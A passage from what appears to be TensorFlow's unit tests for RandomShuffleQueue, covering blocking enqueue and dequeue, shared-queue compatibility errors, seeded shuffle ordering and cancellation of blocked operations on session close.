if queue_size == 4:
break
elif i == 49:
self.fail(
"Blocking enqueue op did not execute within the expected time.")
time.sleep(0.1)
def blocking_close():
self.evaluate(close_op)
thread2 = self.checkedThread(target=blocking_close)
thread2.start()
# Unblock the first blocking_enqueue_op in blocking_enqueue.
q.dequeue().eval()
thread2.join()
thread1.join()
# At this point the close operation will complete, so the next enqueue
# will fail.
with self.assertRaisesRegex(errors_impl.CancelledError, "closed"):
self.evaluate(blocking_enqueue_op)
def testSharedQueueSameSession(self):
with self.cached_session():
q1 = data_flow_ops.RandomShuffleQueue(
1, 0, dtypes_lib.float32, ((),), shared_name="shared_queue")
q1.enqueue((10.0,)).run()
# TensorFlow TestCase adds a default graph seed (=87654321). We check if
# the seed computed from the default graph seed is reproduced.
seed = 887634792
q2 = data_flow_ops.RandomShuffleQueue(
1,
0,
dtypes_lib.float32, ((),),
shared_name="shared_queue",
seed=seed)
q1_size_t = q1.size()
q2_size_t = q2.size()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
self.assertEqual(q2.dequeue().eval(), 10.0)
self.assertEqual(q1_size_t.eval(), 0)
self.assertEqual(q2_size_t.eval(), 0)
q2.enqueue((20.0,)).run()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
self.assertEqual(q1.dequeue().eval(), 20.0)
self.assertEqual(q1_size_t.eval(), 0)
self.assertEqual(q2_size_t.eval(), 0)
def testSharedQueueSameSessionGraphSeedNone(self):
with self.cached_session():
q1 = data_flow_ops.RandomShuffleQueue(
1,
0,
dtypes_lib.float32, ((),),
shared_name="shared_queue",
seed=98765432)
q1.enqueue((10.0,)).run()
# If both graph and op seeds are not provided, the default value must be
# used, and in case a shared queue is already created, the second queue op
# must accept any previous seed value.
random_seed.set_random_seed(None)
q2 = data_flow_ops.RandomShuffleQueue(
1, 0, dtypes_lib.float32, ((),), shared_name="shared_queue")
q1_size_t = q1.size()
q2_size_t = q2.size()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
def testIncompatibleSharedQueueErrors(self):
with self.cached_session():
q_a_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_a")
q_a_2 = data_flow_ops.RandomShuffleQueue(
15, 5, dtypes_lib.float32, shared_name="q_a")
q_a_1.queue_ref.op.run()
with self.assertRaisesOpError("capacity"):
q_a_2.queue_ref.op.run()
q_b_1 = data_flow_ops.RandomShuffleQueue(
10, 0, dtypes_lib.float32, shared_name="q_b")
q_b_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_b")
q_b_1.queue_ref.op.run()
with self.assertRaisesOpError("min_after_dequeue"):
q_b_2.queue_ref.op.run()
q_c_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_c")
q_c_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, shared_name="q_c")
q_c_1.queue_ref.op.run()
with self.assertRaisesOpError("component types"):
q_c_2.queue_ref.op.run()
q_d_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_d")
q_d_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_d")
q_d_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_d_2.queue_ref.op.run()
q_e_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_e")
q_e_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_e")
q_e_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_e_2.queue_ref.op.run()
q_f_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_f")
q_f_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 4)], shared_name="q_f")
q_f_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_f_2.queue_ref.op.run()
q_g_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_g")
q_g_2 = data_flow_ops.RandomShuffleQueue(
10, 5, (dtypes_lib.float32, dtypes_lib.int32), shared_name="q_g")
q_g_1.queue_ref.op.run()
with self.assertRaisesOpError("component types"):
q_g_2.queue_ref.op.run()
q_h_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, seed=12, shared_name="q_h")
q_h_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, seed=21, shared_name="q_h")
q_h_1.queue_ref.op.run()
with self.assertRaisesOpError("random seeds"):
q_h_2.queue_ref.op.run()
def testSelectQueue(self):
with self.cached_session():
num_queues = 10
qlist = []
for _ in xrange(num_queues):
qlist.append(
data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32))
# Enqueue/Dequeue into a dynamically selected queue
for _ in xrange(20):
index = np.random.randint(num_queues)
q = data_flow_ops.RandomShuffleQueue.from_list(index, qlist)
q.enqueue((10.,)).run()
self.assertEqual(q.dequeue().eval(), 10.0)
def testSelectQueueOutOfRange(self):
with self.cached_session():
q1 = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
q2 = data_flow_ops.RandomShuffleQueue(15, 0, dtypes_lib.float32)
enq_q = data_flow_ops.RandomShuffleQueue.from_list(3, [q1, q2])
with self.assertRaisesOpError("is not in"):
enq_q.dequeue().eval()
def _blockingDequeue(self, sess, dequeue_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(dequeue_op)
def _blockingDequeueMany(self, sess, dequeue_many_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(dequeue_many_op)
def _blockingDequeueUpTo(self, sess, dequeue_up_to_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(dequeue_up_to_op)
def _blockingEnqueue(self, sess, enqueue_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(enqueue_op)
def _blockingEnqueueMany(self, sess, enqueue_many_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(enqueue_many_op)
def testResetOfBlockingOperation(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q_empty = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.float32, (
(),))
dequeue_op = q_empty.dequeue()
dequeue_many_op = q_empty.dequeue_many(1)
dequeue_up_to_op = q_empty.dequeue_up_to(1)
q_full = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.float32, ((),))
sess.run(q_full.enqueue_many(([1.0, 2.0, 3.0, 4.0, 5.0],)))
enqueue_op = q_full.enqueue((6.0,))
enqueue_many_op = q_full.enqueue_many(([6.0],))
threads = [
self.checkedThread(
self._blockingDequeue, args=(sess, dequeue_op)),
self.checkedThread(
self._blockingDequeueMany, args=(sess, dequeue_many_op)),
self.checkedThread(
self._blockingDequeueUpTo, args=(sess, dequeue_up_to_op)),
self.checkedThread(
self._blockingEnqueue, args=(sess, enqueue_op)),
self.checkedThread(
self._blockingEnqueueMany, args=(sess, enqueue_many_op))
]
for t in threads:
t.start()
time.sleep(0.1)
sess.close() # Will cancel the blocked operations.
for t in threads:
t.join()
def testDequeueManyInDifferentOrders(self):
with self.cached_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=1729)
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue_many(5)
deq2 = q2.dequeue_many(5)
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
results[0].extend(deq1.eval())
results[1].extend(deq2.eval())
q1.close().run()
q2.close().run()
results[2].extend(deq1.eval())
results[3].extend(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testDequeueUpToInDifferentOrders(self):
with self.cached_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=1729)
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue_up_to(5)
deq2 = q2.dequeue_up_to(5)
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
results[0].extend(deq1.eval())
results[1].extend(deq2.eval())
q1.close().run()
q2.close().run()
results[2].extend(deq1.eval())
results[3].extend(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testDequeueInDifferentOrders(self):
with self.cached_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=1729)
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue()
deq2 = q2.dequeue()
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
for _ in range(5):
results[0].append(deq1.eval())
results[1].append(deq2.eval())
q1.close().run()
q2.close().run()
for _ in range(5):
results[2].append(deq1.eval())
results[3].append(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testBigEnqueueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.int32, ((),))
elem = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
enq = q.enqueue_many((elem,))
deq = q.dequeue()
size_op = q.size()
enq_done = []
def blocking_enqueue():
enq_done.append(False)
# This will fill the queue and then block until enough dequeues happen.
self.evaluate(enq)
enq_done.append(True)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The enqueue should start and then block.
results = []
results.append(deq.eval()) # Will only complete after the enqueue starts.
self.assertEqual(len(enq_done), 1)
self.assertEqual(self.evaluate(size_op), 5)
for _ in range(3):
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 1)
self.assertEqual(self.evaluate(size_op), 5)
# This dequeue will unblock the thread.
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 2)
thread.join()
for i in range(5):
self.assertEqual(size_op.eval(), 5 - i)
results.append(deq.eval())
self.assertEqual(size_op.eval(), 5 - i - 1)
self.assertItemsEqual(elem, results)
def testBigDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(2, 0, dtypes_lib.int32, ((),))
elem = np.arange(4, dtype=np.int32)
enq_list = [q.enqueue((e,)) for e in elem]
deq = q.dequeue_many(4)
results = []
def blocking_dequeue():
# Will only complete after 4 enqueues complete.
results.extend(self.evaluate(deq))
thread = self.checkedThread(target=blocking_dequeue)
thread.start()
# The dequeue should start and then block.
for enq in enq_list:
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.assertEqual(len(results), 0)
self.evaluate(enq)
# Enough enqueued to unblock the dequeue
thread.join()
self.assertItemsEqual(elem, results)
if __name__ == "__main__":
test.main()
|